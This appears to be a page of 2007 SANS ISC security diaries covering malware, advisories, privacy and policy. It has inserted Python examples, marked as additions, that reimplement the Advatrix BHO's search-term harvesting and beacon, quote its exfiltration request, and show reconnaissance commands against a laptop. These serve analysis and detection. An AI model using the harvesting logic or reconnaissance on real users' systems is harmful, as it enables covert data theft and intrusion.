Diaries

Published: 2007-11-30

Facebook, pr0n and privacy

No small amount of controversy has been raised about Facebook apparently tracking and making public the purchases users make online while logged into the Facebook site (even if they aren't making them through Facebook itself).  Without repeating what has been said elsewhere about the controversy (or what I've said in another article I've written on the subject), or going into the specifics of tracking users in general, the interesting part of the controversy is that it was entirely preventable.  When users add applications in Facebook, it asks them if they want messages put in their profile and so forth, allows users to block feeds from being entered by other third-party sites, and there are additional privacy settings that would hide the feed regardless.  Instead of being responsible, users mindlessly clicked forth without thinking of the implications of what they were doing, put information out there that some didn't want out there, and now complain that someone didn't protect them from doing silly things.  What you say and do online can and will be used against you (ok, maybe I'm just a tad cynical there), and when push comes to shove, the only person that can protect their personal data is the person themselves.  And it's not just Facebook you have to worry about.

There are malicious porn sites out there being tracked by McAfee that use pop-ups to extort money from perusers of free porn, and many also sell the personal information of their clientele.  I recall an incident investigation I did some years ago that pointed back to a porn site in Mexico that happily charged people for their wares, and then turned around and sold the credit card information legitimately given to them.  And it's not just unsavory websites that quietly take user information and use it for commercial purposes; big companies do it too (e.g. Google).

The moral of the story is that consumers need to be wary of how, when and to whom they give their personal information online.  For the more privacy conscious, check out the Firefox extensions TrackMeNot and AdBlock Plus to trim down the information you put online.

UPDATE 2011 UTC: Facebook has made some modifications to the tracking service (Beacon) so that users have even more of an opportunity to restrict that information.

UPDATE 2302 UTC: ISC Reader Ken pointed us to a nice writeup in using the Blocksite Firefox plugin to block the Facebook Beacon messages from working.

--
John Bambenek / bambenek (at) gmail [dot] com
University of Illinois

1 Comments

Published: 2007-11-29

Bot Roast II

The FBI announced today that since Operation "Bot Roast" was made public last June, eight individuals have been indicted, pled guilty, or been sentenced for crimes related to botnet activity. Additionally, 13 search warrants were served in the U.S. and by overseas law enforcement partners in connection with this operation. This ongoing investigative effort has thus far uncovered more than $20 million in economic loss and more than one million victim computers.  Round two of this effort, called "Bot Roast II" has resulted in:

  • Three new indictments, including two this past month. In one case, the FBI uncovered a denial of service attack on a major university in the Philadelphia area and then knocked out much of the botnet by disrupting its ability to talk to other computers.
  • Two previously charged criminals who pled guilty, including a California man who is a well known member of the botnet underground.
  • The sentencing of three others, including a pair of men who launched a major phishing scheme targeting a Midwest bank that led to millions of dollars in losses.

Well done, FBI, and keep at it! 

Marcus H. Sachs
Director, SANS Internet Storm Center

0 Comments

Published: 2007-11-29

Treacherous malware: the story of Advatrix

Recently I spent some time analyzing a relatively simple BHO (Browser Helper Object) just to see what the bad guys were really doing with it.

The BHO was dropped by an executable, which was part of a bigger adware package pretending to be an anti-virus program (of course). The only file written by this dropper was the DLL itself, which the dropper then registered with the system as a BHO.

After a quick analysis I found out that the BHO captured queries sent to various search engines and other commonly visited web sites and submitted them to a third web site. That site could then display targeted ads on the infected machine (when I tested the BHO, that component did not work).

The list of sites that the BHO stole information from was impressive – there were almost 140 sites monitored. For every site, the BHO had information about exactly what to extract, so only the user’s query was sent and not the whole URL.

For example, for wikipedia.org, the BHO extracted the search= parameter, while for search.yahoo.com it extracted the p= parameter.

The extracted parameters were then submitted to a third site (which is not working any more) with the following request (the %25s and %25d are URL-encoded printf-style placeholders that the BHO fills in):

http://[removed]/adtest/index.phtml?svLID=%25s&svAFF_ID=%25d&
svCHECKIN_ID=%25d&svPOPUP=TARGETED&svKEYWORDS=%25s&svVERSION=%25d

The two most interesting things in this request are the svPOPUP and svKEYWORDS arguments. svPOPUP tells the ad site to display targeted ads related to the keywords submitted in the svKEYWORDS argument. As you can probably guess, those are the search terms that the user entered.
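To make the harvesting concrete, here is the BHO's logic reproduced in plain Python as an added example (this is not code from the diary or from the Advatrix sample): a per-host table of which query parameter to lift, the extraction of only that parameter, the beacon request built from the quoted template, and a matcher that flags the beacon in proxy logs. Only the wikipedia.org and search.yahoo.com entries come from the diary; the other hosts, the beacon hostname, the LID/affiliate/check-in values and the proxy log lines are constructed for this example.

```python
from urllib.parse import urlsplit, parse_qs, urlencode

# Which query parameter carries the user's search term on each monitored host.
# wikipedia.org -> search= and search.yahoo.com -> p= are from the diary; the
# rest are assumptions standing in for the ~140 entries the real BHO carried.
MONITORED = {
    "wikipedia.org": "search",
    "en.wikipedia.org": "search",
    "search.yahoo.com": "p",
    "www.google.com": "q",
}


def harvest_keywords(url):
    """Return the search term the BHO would extract from url, or None.

    Only the named parameter is taken, never the whole URL, which is why the
    leaked data is so compact and so useful for ad targeting.
    """
    parts = urlsplit(url)
    param = MONITORED.get(parts.hostname or "")
    if param is None:
        return None
    values = parse_qs(parts.query).get(param)
    return values[0] if values else None


def beacon_url(keywords, lid="abc", aff_id=1, checkin_id=2, version=3):
    """Fill the request template quoted in the diary.

    The ad host and the id values are placeholders (the real site is gone).
    """
    query = urlencode({
        "svLID": lid,
        "svAFF_ID": aff_id,
        "svCHECKIN_ID": checkin_id,
        "svPOPUP": "TARGETED",
        "svKEYWORDS": keywords,
        "svVERSION": version,
    })
    return "http://ad.example.invalid/adtest/index.phtml?" + query


# Shape of the beacon as it shows up in a web proxy log: path plus the two
# telltale arguments.  Matching on all three keeps false positives down.
BEACON_MARKERS = ("/adtest/index.phtml", "svPOPUP=TARGETED", "svKEYWORDS=")


def find_beacons(log_lines):
    """Return the proxy log lines that carry the Advatrix beacon."""
    return [line for line in log_lines if all(m in line for m in BEACON_MARKERS)]


# Constructed proxy log (timestamp, client, method, URL, status); the second
# line is what an infected client emits after the first one.
SAMPLE_PROXY_LOG = """\
1196345601.123 10.0.0.5 GET http://en.wikipedia.org/w/index.php?search=buffer+overflow 200
1196345601.987 10.0.0.5 GET http://ad.example.invalid/adtest/index.phtml?svLID=abc&svAFF_ID=1&svCHECKIN_ID=2&svPOPUP=TARGETED&svKEYWORDS=buffer+overflow&svVERSION=3 200
1196345602.500 10.0.0.7 GET http://www.example.org/index.phtml?svPOPUP=NONE 200
"""

if __name__ == "__main__":
    term = harvest_keywords("http://en.wikipedia.org/w/index.php?search=buffer+overflow&go=Go")
    print("harvested:", term)
    print("beacon:   ", beacon_url(term))
    for hit in find_beacons(SAMPLE_PROXY_LOG.splitlines()):
        print("proxy hit:", hit)
```

Because the beacon is a plain GET with a fixed path and argument names, a proxy or IDS rule keyed on `/adtest/index.phtml` together with `svPOPUP=TARGETED` catches infected clients regardless of which of the monitored sites the user searched.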

This was all more or less standard, only the number of monitored web sites seemed pretty high – this BHO certainly had a serious impact on a user’s privacy.

After I searched the web a bit, I found out that Elia Florio from Symantec already described another variant of this same BHO which they called Trojan.Advatrix (Symantec's description is here). Besides the information I already had, that particular variant did something else to the machine. Something very, very mean.

Elia found out that the BHO modifies Internet Explorer so that it becomes vulnerable to two security vulnerabilities: MS06-014 known as the MDAC vulnerability and MS07-017, known as the ANI vulnerability.

These two vulnerabilities are probably the most exploited vulnerabilities in Internet Explorer today. The MS06-014 vulnerability is practically a part of every exploit pack today (and is certainly in MPACK, which is the most popular one). Exploits for the ANI vulnerability can also still be found almost everywhere.

What makes me extremely worried is how hidden this whole thing is. The BHO patches Internet Explorer's in-memory image, which means that no files are written to the disk. In other words, such a machine will look completely patched to Windows Update or any other patch checking system, because those compare file versions on disk and nothing on disk has changed. However, while the BHO is active, the machine is vulnerable to the two most exploited client side vulnerabilities of the last couple of years. The only artifacts are the registered BHO itself and the modified code inside the running iexplore.exe process.

The last line of defense, the anti-virus program, is not particularly helpful here either. The dropper I had was detected by only 13 out of 32 AV programs on VirusTotal and the DLL detection was even worse with only 7 AV programs detecting it.

While there are many lessons to learn from this malware, I would like to stress one really important thing: when a machine gets infected, your only option is to reinstall it from scratch. With today's malware phoning home and installing stealthy, updated modules, this is really a no brainer.

--

Bojan

1 Comments

Published: 2007-11-28

Google Search Campaign

Computerworld is reporting a "large scale, coordinated campaign to steer users toward malware-spewing Websites from Google search results is under way."  

  • Approximately 40,000 pages are reported to be hosting malware. 
  • 27 different domains are involved.
  • Each domain has up to 1499 malicious pages.
  • Tactics used, per Sunbelt:
    • "comment spam" - bots post links in the comment sections of blogs
    • "blog spam" - bogus blog posts
    • plugging links into any web form that requests a link

Please let us know if you are seeing this activity via our contact page.

Thanks, Mari Nichols

 

0 Comments

Published: 2007-11-27

Reader submitted question on Social-Engineering

As you can imagine, here at the ISC we get thousands (tens of thousands?) of user submitted questions and suggestions.  Let me tell you what, we appreciate it.  It's what binds the galaxy together. (TM)

But we had a user submitted question today that I found particularly interesting.  Jim wrote in asking us:

"I am looking for some good policies and practices to help my help desk avoid falling victim to social engineering.  I looked around on SANS and other sites but find little more than asking a few questions to verify identity.  We are also considering a callback as a auditing step.  What do you think?"

So what DO you think readers? 

 

Joel Esler

http://www.joelesler.net

0 Comments

Published: 2007-11-27

Lotus Notes buffer overflow in the Lotus WorkSheet file processor

Core Security has put out a new advisory concerning a buffer overflow in Lotus Notes, in the Lotus 1-2-3 worksheet viewer (l123sr.dll from the Verity KeyView SDK). It is both remotely and locally exploitable.

Core lists the vulnerable software pieces as:

- Lotus Notes version 7.x
- Lotus Notes version 8.x (not confirmed by Core)
- Lotus Notes version 6.5.6 (not confirmed by Core)
- Other software packages using Verity KeyView SDK using vulnerable
versions of l123sr.dll

Although it's prudent to keep in mind that, as of now, 8.x and 6.5.6 are NOT confirmed by Core (as stated in their advisory, and in the cut and paste above).

Cut and Paste from Core's Advisory:

Lotus Notes customers should follow the instructions of the following
support Technote, which outlines the available options based on specific
versions of Lotus Notes:

http://www.ibm.com/support/docview.wss?rs=475&uid=swg21285600

Workaround 1: Delete the keyview.ini file in the Notes program directory.
This disables ALL viewers. When a user clicks View (for any file), a
dialog box will display with the message "Unable to locate the viewer
configuration file.".

Workaround 2: Delete the problem file l123sr.dll file. When a user tries
to view the specific file type, a dialog box will display with the message
"The viewer display window could not be initialized." All other file types
work without returning the error message.

Workaround 3: Comment out specific lines in keyview.ini for any references
to the problem file (l123sr.dll). To comment a line, you precede it with a
semi-colon (;). When a user tries to view the specific file type, a dialog
box will display with the message "The viewer display window could not be
initialized". For example:
[KVWKBVE]
;81.2.0.5.0=l123sr.dll
;81.2.0.9.0=l123sr.dll

Workaround 4:  Filter inbound emails with attachments with potentially
malicious files.  Lotus 1-2-3 files are usually associated to MIME
Content-Type headers set to the following strings:
application/lotus-1-2-3
application/lotus123
application/x-lotus123
application/wks
application/x-wks
application/vnd.lotus-1-2-3
Note however that workaround #4 is a simply stop gap measure that could be
circumvented by relatively unsophisticated attackers.
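To show why workaround #4 is only a stop gap, here is a mail-gateway check written as an added example (it is not part of Core's advisory or the diary): it quarantines attachments by the listed Content-Type strings, but also matches on the attachment filename, because the Content-Type header is entirely under the sender's control. The sample message is constructed for this example and the extension list (.wk1, .wk3, .wk4, .wks, .123) is an assumption about what KeyView hands to l123sr.dll.

```python
from email import message_from_string

# MIME types from Core's workaround #4.
LOTUS_MIME_TYPES = {
    "application/lotus-1-2-3",
    "application/lotus123",
    "application/x-lotus123",
    "application/wks",
    "application/x-wks",
    "application/vnd.lotus-1-2-3",
}

# Filename extensions the Lotus 1-2-3 viewer handles (assumption for this
# example).  A sender can relabel the Content-Type, but the viewer is chosen
# by the file, so the name is the second net.
LOTUS_EXTENSIONS = (".wk1", ".wk3", ".wk4", ".wks", ".123")


def lotus_attachments(raw_message):
    """Return (filename, content_type, reason) for each suspect attachment.

    reason is "content-type" when the declared MIME type is on the list and
    "filename" when only the attachment name gives it away.
    """
    msg = message_from_string(raw_message)
    hits = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        name = (part.get_filename() or "").lower()
        if ctype in LOTUS_MIME_TYPES:
            hits.append((name, ctype, "content-type"))
        elif name.endswith(LOTUS_EXTENSIONS):
            hits.append((name, ctype, "filename"))
    return hits


# Constructed test message: one attachment declares itself honestly, the
# second hides behind application/octet-stream and is caught by name only.
SAMPLE_MESSAGE = """From: a@example.invalid
To: b@example.invalid
Subject: quarterly figures
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="XX"

--XX
Content-Type: text/plain

see attached
--XX
Content-Type: application/vnd.lotus-1-2-3; name="q3.123"
Content-Disposition: attachment; filename="q3.123"
Content-Transfer-Encoding: base64

AAAA
--XX
Content-Type: application/octet-stream; name="budget.wk4"
Content-Disposition: attachment; filename="budget.wk4"
Content-Transfer-Encoding: base64

AAAA
--XX--
"""

if __name__ == "__main__":
    for name, ctype, reason in lotus_attachments(SAMPLE_MESSAGE):
        print(f"quarantine {name!r} ({ctype}) matched by {reason}")
```

Even with both checks, a file renamed to .txt and renamed back by the recipient still reaches the vulnerable viewer, which is why removing or commenting out l123sr.dll (workarounds #2 and #3) is the fix to aim for.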

 

Joel Esler

http://www.joelesler.net

0 Comments

Published: 2007-11-27

Time to update your Firefoxes! (Firefox 2.0.0.10)

There's a new update for Firefox out.  2.0.0.10.

Copy and Paste from Mozilla.org on the updated security features:

MFSA 2007-39 Referer-spoofing via window.location race condition
MFSA 2007-38 Memory corruption vulnerabilities (rv:1.8.1.10)
MFSA 2007-37 jar: URI scheme XSS hazard

 

Joel Esler

http://www.joelesler.net

2 Comments

Published: 2007-11-26

With popularity comes responsibility

There has been a considerable growth in online collaboration tools. Wiki's are an excellent example of these, and the growth of their use has been dramatic.

However, this success can lead to logistical issues when security advisories are released. Today a reader contacted us with a plea to help alert users of TikiWiki that known vulnerabilities in it are being actively exploited.

The TikiWiki team have been working hard on fixing a number of reported vulnerabilities with their Wiki. However it is the site administrators that have been slow to update their systems.

Mose from the TikiWiki project has been very helpful in highlighting that they are working on a new administration pane within their application which will alert administrators to new releases being available. Until then, if you are using TikiWiki, please update to the latest release. For details go to : http://info.tikiwiki.org/tiki-index.php

0 Comments

Published: 2007-11-26

Apple QuickTime 7.3 RTSP Response 0day

Thank you all for writing in!!  We appreciate it, things have been a little crazy around the ISC today, so we haven't been able to throw some stuff up on the diary about the Quicktime bug.  (We've had to wake everyone up, they all ate turkey..tryptophan... it's not pretty, anyway...)

As outlined by Secunia, Apple's QuickTime 7.2 and 7.3 have a buffer overflow when parsing RTSP responses, so a malicious streaming server (or a web page pointing at one) can attack the client.  Check it out here

There are several things you can do until this gets patched (just remember to undo them after you patch!).

1) Block the RTSP protocol.  The default ports are 554/tcp and 6970-6999/udp.  Keep in mind that a malicious server can listen on whatever port an rtsp:// link names, so a port-based block at the perimeter only stops the defaults.

2) Set the Killbit for Quicktime CLSID's:

    {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}
    {4063BE15-3B08-470D-A0D5-B37161CFFD69}
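Since the diary says to set the kill bit but not how, here is the mechanism as an added example (not from the diary or US-CERT): a kill bit is the 0x400 flag in the "Compatibility Flags" DWORD under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}. The script below generates the .reg file that sets it for the two QuickTime CLSIDs listed above, the .reg that removes it again after patching, and the flag arithmetic for a machine that already has other compatibility bits set. The CLSIDs are the diary's; everything else is standard registry format.

```python
# Kill bit: bit 10 of the Compatibility Flags DWORD.
KILLBIT = 0x00000400
COMPAT_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer"
              r"\ActiveX Compatibility")

# QuickTime control CLSIDs from the diary.
QUICKTIME_CLSIDS = [
    "{02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}",
    "{4063BE15-3B08-470D-A0D5-B37161CFFD69}",
]


def killbit_set(compat_flags):
    """True if the kill bit is present in an existing Compatibility Flags value."""
    return bool(compat_flags & KILLBIT)


def apply_killbit(compat_flags):
    """Merge the kill bit into an existing value instead of overwriting it,
    so other compatibility bits the vendor set are preserved."""
    return compat_flags | KILLBIT


def clear_killbit(compat_flags):
    """Undo step for after the patch: drop only the kill bit."""
    return compat_flags & ~KILLBIT


def reg_file(clsids, remove=False):
    """Build a .reg file that sets (or, with remove=True, deletes) the
    Compatibility Flags value for each CLSID.  A value of '-' in .reg
    syntax deletes the value, which lets IE load the control again."""
    lines = ["Windows Registry Editor Version 5.00", ""]
    for clsid in clsids:
        lines.append(f"[{COMPAT_KEY}\\{clsid}]")
        if remove:
            lines.append('"Compatibility Flags"=-')
        else:
            lines.append(f'"Compatibility Flags"=dword:{KILLBIT:08x}')
        lines.append("")
    return "\n".join(lines)


if __name__ == "__main__":
    print(reg_file(QUICKTIME_CLSIDS))          # import this before the patch
    print(reg_file(QUICKTIME_CLSIDS, True))    # import this after the patch
```

If a CLSID already has a Compatibility Flags value, read it first and write back `apply_killbit(existing)` rather than the bare 0x400, otherwise you silently drop whatever else was set there.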

There are some other recommendations over at the US-CERT site.  But like I said, remember to undo them after the patch, or you will be wondering why things aren't working with your Quicktime streams. 

Please remember that Quicktime is a component of iTunes...


Joel Esler

http://www.joelesler.net

1 Comments

Published: 2007-11-25

Gadget Security

Last week I got my xmas gift...:) A Eeepc, (see wikipedia on it).

Basically, it is a small laptop (7'' screen), running a Linux distribution called Xandros (Debian based), with a quite user-friendly interface, mostly for internet applications.

Well, it is quite good, and I am really liking it, but, of course, I had to try its security :).

It allows you to get a console, from which you instantly get root access by issuing 'sudo bash' with no password.
This is not good: anyone who gets hold of the device can change the root password, possibly leaving you with the only remaining alternative, restoring the system. So configuring sudo to ask for a password is a 'must do', imho...:)

But let’s go to interesting stuff.
I was curious to see which ports were open, so I ran nmap against it from another host.


That was the result:
The SYN Stealth Scan took 0.61s to scan 1239 total ports.
Host 192.168.0.207 appears to be up ... good.
Interesting ports on 192.168.0.207:
Not shown: 1236 closed ports
PORT    STATE SERVICE
111/tcp open  rpcbind
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap finished: 1 IP address (1 host up) scanned in 1.525 seconds

Hum...ports 111, 139 and 445. 139 and 445 are usually associated with Windows systems, but we are on Linux.
And port 111 is portmap...

So let's dig a little more, using smbclient to query the remote system:

lab3:~# smbclient -N -L '\\192.168.0.207'   (-L to list and -N for no password)
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.24]

        Sharename       Type      Comment
        ---------       ----      -------
        IPC$            IPC       IPC Service (eeepc-root server (Asus Eee PC))
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.24]

        Server               Comment
        ---------            -------
        EEEPC-ROOT           eeepc-root server (Asus Eee PC)

        Workgroup            Master
        ---------            -------
        GRUPO                SRVWIN1
        MSHOME               PEDROLAP
        WORKGROUP            EEEPC-ROOT

In my opinion this is too much information to be shared...
Here we learn that the Eee PC is running Samba (that explains ports 139 and 445), the Samba version (3.0.24), and some workgroup and share info...

On port 111, nmap says portmap, so let's check it with rpcinfo:

lab3:~# rpcinfo -p 192.168.0.207
   program vers proto   port
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper

Yes, portmap!

On the Eee PC itself, we can check those with netstat -anp:
lab3:~# netstat -anp

Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN     2339/smbd       
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN     1409/portmap    
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN     1398/cupsd      
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN     2339/smbd                      
udp        0      0 192.168.0.207:137       0.0.0.0:*                          2337/nmbd       
udp        0      0 0.0.0.0:137             0.0.0.0:*                          2337/nmbd       
udp        0      0 192.168.0.207:138       0.0.0.0:*                          2337/nmbd       
udp        0      0 0.0.0.0:138             0.0.0.0:*                          2337/nmbd       
udp        0      0 0.0.0.0:68              0.0.0.0:*                          2157/dhclient3  
udp        0      0 0.0.0.0:68              0.0.0.0:*                          1613/dhclient3  
udp        0      0 0.0.0.0:111             0.0.0.0:*                          1409/portmap    
udp        0      0 0.0.0.0:631             0.0.0.0:*                          1398/cupsd      


Again, Samba (smbd and nmbd) and portmap (sunrpc). CUPS (the print service) is there too: its TCP listener is bound to 127.0.0.1 only, but its UDP socket on 631 is bound to all interfaces.
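The listing above is the kind of thing worth checking on any new device before deciding what to stop or wrap. As an added example (not from the diary), the script below parses `netstat -anp` output, using the diary's own listing as embedded sample input, and reports which programs are listening on something other than loopback; it separates tcp from udp so that a daemon bound safely on one and wide open on the other (cupsd here) is not missed.

```python
# Parse `netstat -anp` output and report what is reachable from the network.

# Sample input: the Eee PC listing from the diary, header lines included.
SAMPLE_NETSTAT = """Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN     2339/smbd
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN     1409/portmap
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN     1398/cupsd
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN     2339/smbd
udp        0      0 192.168.0.207:137       0.0.0.0:*                          2337/nmbd
udp        0      0 0.0.0.0:137             0.0.0.0:*                          2337/nmbd
udp        0      0 192.168.0.207:138       0.0.0.0:*                          2337/nmbd
udp        0      0 0.0.0.0:138             0.0.0.0:*                          2337/nmbd
udp        0      0 0.0.0.0:68              0.0.0.0:*                          2157/dhclient3
udp        0      0 0.0.0.0:68              0.0.0.0:*                          1613/dhclient3
udp        0      0 0.0.0.0:111             0.0.0.0:*                          1409/portmap
udp        0      0 0.0.0.0:631             0.0.0.0:*                          1398/cupsd
"""

LOOPBACK = ("127.0.0.1", "::1")


def parse_netstat(text):
    """Turn netstat -anp lines into dicts; header lines are skipped.

    tcp lines carry a State column, udp lines do not, so the program name is
    taken from the last field rather than a fixed column.
    """
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6 or fields[0] not in ("tcp", "udp", "tcp6", "udp6"):
            continue
        addr, _, port = fields[3].rpartition(":")
        pid, _, prog = fields[-1].partition("/")
        rows.append({"proto": fields[0], "addr": addr, "port": int(port),
                     "pid": pid, "prog": prog})
    return rows


def exposed_listeners(rows):
    """Map program name -> set of (proto, port) bound to a non-loopback address."""
    exposed = {}
    for r in rows:
        if r["addr"] in LOOPBACK:
            continue
        exposed.setdefault(r["prog"], set()).add((r["proto"], r["port"]))
    return exposed


def report(exposed):
    """Human-readable lines, one per program, sorted for stable output."""
    lines = []
    for prog in sorted(exposed):
        socks = ", ".join(f"{proto}/{port}" for proto, port in sorted(exposed[prog]))
        lines.append(f"{prog:<10} {socks}")
    return lines


if __name__ == "__main__":
    for line in report(exposed_listeners(parse_netstat(SAMPLE_NETSTAT))):
        print(line)
```

On the diary's listing this reports smbd, nmbd, portmap, cupsd (udp/631 only) and dhclient3; the last one is the DHCP client and is expected, the rest are the candidates for stopping or wrapping.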

Now, we could try to create some iptables rules to restrict access, but the iptables modules are not loaded...:(

Another alternative is to shut the services down.

Since it is a Debian-based Linux, this can easily be done with:

/etc/init.d/portmap stop
/etc/init.d/samba stop

but that only stops them for the current session. If you reboot, they will be back...

Another option is to edit /etc/hosts.deny and add the line

portmap:ALL

to restrict access to this service. Note that hosts.deny only governs daemons that consult TCP wrappers (portmap does); Samba is controlled by the "hosts allow" and "hosts deny" settings in smb.conf instead.

Or even disable them, by commenting the daemons out of the /usr/sbin/services.sh file.

 

Again, I am not saying that leaving these services open means that you will be hacked, and I am not aware of any recent vulnerability in them, but we are at least giving away too much information...

 

This is just one example of how our new gadgets can expose us. New smart phones, Linux or Windows based, can also expose you and your data, and as we use them to store lots of our data, we must be paranoid about their security measures...at least I am...:)

 

Ah, about my eeepc...it is not McDonalds, but "I am loving it!" :) All my security tools were installed perfectly on it...;)

 


---------------------------------------------------------

Handler on Duty: Pedro Bueno ( pbueno //&&// isc. sans. org)

 

1 Comments

Published: 2007-11-24

Policies - Need them, sure, how do we get them approved?

As I was reading Deb's article yesterday about our need for policies, my first thought was yes, of course we need policies!  We are able to write all the policies we want, but how do we get them approved?  Do we break the policies down into smaller sections for faster approval?  Or do we publish one "Acceptable Use Policy" and hope that covers us with our employees?  Do we ask for volunteers for a policy committee?  Do we forget about setting standards and just get general network usage policies approved?

Policies, procedures and standards are necessary for multiple reasons.  One of the key reasons is to set the record straight for the users of our systems and our system administrators setting up the systems.  We need to set the limits on what they can and cannot do.  Do you even know where you stand?  Do you know what is "acceptable risk" for your organization?  Would you have the budget to put behind the policy if it were approved?

Remember to utilize your legal department and internal audit department (if you have them) for assistance in getting justification. We all know that being able to provide proper documentation plays a key role during litigation, whether the incident is an outside attack or insider related. These people will help you get the ball rolling in the right direction, if you need help.

If and when you get your policy approved, how often should you revisit and revise?  Did you set these time tables into the policy or just thank the digital stars that you finally got sign off?  We would like to hear your policy battle stories.  Please send any lessons learned from your policy process to us here.  I'm looking forward to learning some new techniques.

Fair Winds,

Mari

 

 

0 Comments

Published: 2007-11-23

Data Policies - Do we need them?

Corporate IT departments spend millions of dollars to secure the perimeters of their networks. Firewalls, gateway filtering, intrusion detection systems and monitoring services are some of the methods used to keep hackers and malicious code out. Yet their data may still be getting compromised without their knowledge.  In today's age of mobile technology the data may be leaking out unintentionally. 

In the past the policy was pretty simple: everyone uses VPN and two factor authentication. Today many corporations use intranets and internal web pages to store and access data.  This makes it handy for the worker who travels and works on the road.  However, if the employee isn't thinking about the security of the company data, or hasn't been trained in the methods needed to secure it, the company can experience a data leak. For instance, if the employee checks their email or accesses these internal websites from a public terminal in an airport, Internet cafe, hotel, etc., what data is left behind? Who could be "shoulder surfing" and watching them work?  What about programs planted on these machines that can record everything entered (including userid and password information)? If you look at programs like WebWatcher and Spector Pro, you see how easy it may be to capture everything from a public terminal.  Because of programs such as these, should corporations have policies against use of public terminals to access company information?

What about the information posted in public tech support sites or blog sites?  Is too much information being revealed online in insecure locations?  Many self help tech support sites are available on the Internet.  There is a wealth of information available and a huge community of "experts" available online.  This can be a great thing.  However, is proprietary or critical company information being posted in these sites?  It is interesting to see the amount of information about their company, systems and network people are willing to share in these exchanges without even realizing that they have just given the bad guy the "key to the door". 

Do corporations/companies, (large and small) have policies and procedures in place to minimize the amount of information leakage their company experiences?  How do we educate and train our employees to think about what they are doing and how it will impact the company? 

SANS Institute has a significant number of resources and templates available for you to start the process of identifying and developing Policies and Procedures.   www.sans.org/resources/policies/  This is a good starting place and has some really good templates for a number of security related concerns.

We would like to know if you have a particular policy or procedure that you would like to share with us or if you have good online resources you can recommend.

0 Comments

Published: 2007-11-22

Russian Business Network - Additional Analysis

One of our readers, David Bizeul, spent the past three months researching the Russian Business Network (RBN).  The RBN is a virtual safe house for Russian criminals responsible for malicious code attacks, phishing attacks, child pornography and other illicit operations (we previously provided an analysis of the RBN that was produced by iDefense.)  The 70-page paper is on David's web site, and David said that he may update it in the future.  We are mirroring the paper for him just in case his site gets overloaded.  David's contact information is in the paper so if you like what you see please let him know.

Marcus H. Sachs
Director, SANS Internet Storm Center

0 Comments

Published: 2007-11-22

Holiday Shopping - Give Some Security

Happy Thanksgiving to all of our USA readers!  For most countries, this weekend coming up is the start of the holiday season.  For many retailers, tomorrow (Friday November 23rd) is "Black Friday" and recently there's been the introduction of "Cyber Monday" (Monday November 26th) when everybody comes back to work and uses their office computers to go shopping online.  However and wherever you shop, and whatever your customs and traditions are, as we enter another holiday season it's time once again to think about computer security for our family and friends.

This is a golden opportunity for information security professionals around the world to spread the word about security and to "give some security" when you exchange presents later this year.  Let us know what you plan to give as a security gift to your friends and families.  Do you know of any cool ideas that other readers might like?  Did somebody give you something last year that really helped you with security?  I doubt that grandma would appreciate a copy of Hacking for Grannies Exposed but I'm sure that there is something on the shelf that would be good for her in a security sense.  Please use our contact form to let us know your plans to "give some security" this year.  We'll post the best ideas here later in the day.

UPDATE

Art wrote us with a good idea: instead of buying security stuff, he is making CD's for friends and family.  He'll put free stuff on them, FREE AVG, Spybot Search and Destroy, and links to other downloads in a .txt file such as Windows Defender.  He said it's not a gift for them, it’s for him.  Less headaches, he said.  He also suggested a gift his wife might consider, a Cisco PIX.  Nice touch, Art!  I hope that Santa is nice to you.

Marcus H. Sachs
Director, SANS Internet Storm Center

1 Comments

Published: 2007-11-21

Social Engineering, just by asking!

A reader wrote in to tell us about a spam he received that read like this:

"I'm a computer engineer at Islamic University of Gaza(IUG), the network of my university hacked in the last few months , now I design a secure model to repair the network security system in IUG but my experience still little, so I hope that I can obtain a diagram or flowchart or map of  your university network security system to study it and see how can apply it in IUG system."

I guess that's a good way of getting information about your network innards instead of hacking it "hey, can you just send me your visio diagram!?  That'd be great, kthnkx!"

Bold.

Gotta watch out for that Social Engineering.  It's the basis of all those bank, Visa, Mastercard, etc. spams, phishes, and whatever other things are out there now-a-days: counting on an "uneducated" user to click and fill out some information.

Joel Esler

http://handlers.sans.org/jesler

0 Comments

Published: 2007-11-21

Security 2.0

Been thinking lately about some of the restrictive policies that corporations, .mil, .gov, and some others have when it comes to security.

Does it work?

Where are we at?  

Are all the extremely restrictive policies in your corporate work environment working?  

What can be relaxed?  Why?

 

Example:  I recently ran across a case where iTunes was not allowed on the network because it was considered P2P.  Is iTunes P2P?  Of course not, but here is an example of where re-education for the "experts" and the loss of "policy for policy's sake" may be helpful.

 

We'd like to hear your feedback.  What does Security 2.0 mean to you?  We all have our own opinions, we'd like to hear yours!

 

Joel Esler

http://handlers.sans.org/jesler

4 Comments

Published: 2007-11-20

“There is nothing on my computer that a hacker would be interested in”

“There is nothing on my computer that a hacker would be interested in.”

How often do you hear that statement as a key point in someone’s defense strategy? It is something I’ve often heard in social outings and family gatherings.

I try to use it as an opportunity for security awareness. First, rephrase the statement to be: "There is nothing on my computer that a criminal would be interested in." This takes the conversation away from the contentious "what does the word hacker mean" debate. If you focus on protecting yourself from criminals, you stand a pretty good chance against hackers/crackers as well (whether or not you feel there is such a distinction.)

What makes up an abstract computer system on the Internet?

  • CPU
  • Memory
  • Hard Drive
  • Internet access/IP address
  • User data

So what would a criminal be interested in on this average computer?

